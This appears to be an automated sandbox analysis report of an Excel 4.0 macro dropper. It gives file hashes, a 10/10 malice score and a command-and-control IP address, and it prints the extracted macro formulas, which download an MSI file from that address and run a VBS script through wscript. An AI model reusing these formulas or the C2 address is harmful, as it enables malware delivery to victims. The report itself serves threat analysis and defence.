General

  • Target

    c9427fcf98db490e85a68a0e32affc55

  • Size

    6KB

  • Sample

    231222-r31flscdfk

  • MD5

    c9427fcf98db490e85a68a0e32affc55

  • SHA1

    0f4ac8046681a5a89b56e85a8bd7bce0eda93c9f

  • SHA256

    df5928d50a09885720fd5a22c357ace279e5cbe9c1af0915178a07e9ffb9c109

  • SHA512

    d42cea10aff9062f0cdb1d7c033720cbce62dbf3c2b2cc2f0064051fb4cc5d9c9d7981b04d67d1745f4b1ade78f9bfbe8c76fd196e9f88ea2b5ebb32ff2bb3f8

  • SSDEEP

    192:NDSNuSPbrA2OmmfRO8UhHFBFYuIb98yVr+8:NquMM2wU1FYFb98yVj

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Targets

    • Target

      c9427fcf98db490e85a68a0e32affc55

    • Size

      6KB

    • MD5

      c9427fcf98db490e85a68a0e32affc55

    • SHA1

      0f4ac8046681a5a89b56e85a8bd7bce0eda93c9f

    • SHA256

      df5928d50a09885720fd5a22c357ace279e5cbe9c1af0915178a07e9ffb9c109

    • SHA512

      d42cea10aff9062f0cdb1d7c033720cbce62dbf3c2b2cc2f0064051fb4cc5d9c9d7981b04d67d1745f4b1ade78f9bfbe8c76fd196e9f88ea2b5ebb32ff2bb3f8

    • SSDEEP

      192:NDSNuSPbrA2OmmfRO8UhHFBFYuIb98yVr+8:NquMM2wU1FYFb98yVj

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks